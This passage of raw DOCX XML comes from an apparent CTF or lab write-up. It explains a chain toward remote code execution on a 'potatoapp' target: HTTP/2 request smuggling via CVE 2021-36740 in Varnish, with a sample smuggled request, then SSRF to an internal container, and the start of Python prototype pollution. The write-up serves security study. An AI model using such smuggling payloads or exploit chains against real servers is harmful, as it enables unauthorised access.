                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="2412" l="695" r="29603" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="42386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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o2qmy9y8orgi" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> get remote code execution to get a reverse shell, the attacker would need to chain together several vulnerabilities such as request smuggling, server-side request forgery, python prototype pollution and Unicode normalization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kcq1wn28cbi8" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">H2 Request smuggling using CVE 2021-36740</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP request smuggling is a technique for interfering with the way a website processes sequences of HTTP requests that are received from one or more users. CVE 2021-36740 affects the varnish cache with HTTP/2 enabled to allow request smuggling and VCL authorization bypass via a modified Content-Length header for a POST request.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A sample request would look like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the backend would interpret the request above as 2 separate requests </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(2)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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3900"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4020"/>
            <w:gridCol w:w="390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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="2008.86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POST /login HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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Host: localhost</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">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Content-Length: 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">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DB">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aGET / HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">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Host: localhost</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">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Connection: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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /login HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: localhost</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Length: 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="green"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">a</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: localhost</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="cyan"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">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highlight w:val="cyan"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection: Close</w:t>
            </w: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00" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the "config/default.vcl" configuration file, it's evident that access to the "connectivitytester" endpoint is restricted to the administrative IP "127.0.0.1." To gain access to the "connectivitytester" endpoint, an approach involving request smuggling will be required.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3200400" cy="1816698"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="5" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="15726" l="0" r="5357" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="18166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A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s0apwjmc7vhu" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server-Side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SSRF)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location. The attacker might cause the server to make a connection to internal-only services or force the server to connect to arbitrary external systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pictures documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_4x56p72dzxdc">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.5.2. - Server-Side Request Forgery (SSRF)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable code is in potatoapp/app.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we can see, the `connectivitytester` endpoint allows the server to request an external page using urllib.request.urlopen(req). The external page is taken from the value pass from the `ùrl` parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the docker-compose.yml file, we can see that there is another container called `potatodev` and in the /potatodev/app.py we can see that it is running on port 1369. Thus using server-side request forgery, we can request the potatodev container. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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0F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zhbo8egje562" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Prototype Pollution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects. However, there are no prototypes in Python. But Python has magic methods which are methods that are implicitly invoked by all objects in Python during various operations, such as __str__(), __eq__(), and __call__()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They are used to specify what objects of a class should do when used in various statements and with various operators.These methods have their default implementation for built-in classes, which we will be implicitly inheriting from when creating a new class, however, developers can override these methods and provide their implementation when defining new classes. It is also possible to update objects of mutable types to define or overwrite their attributes and methods at runtime.</w:t>
      </w:r>
    </w:p>
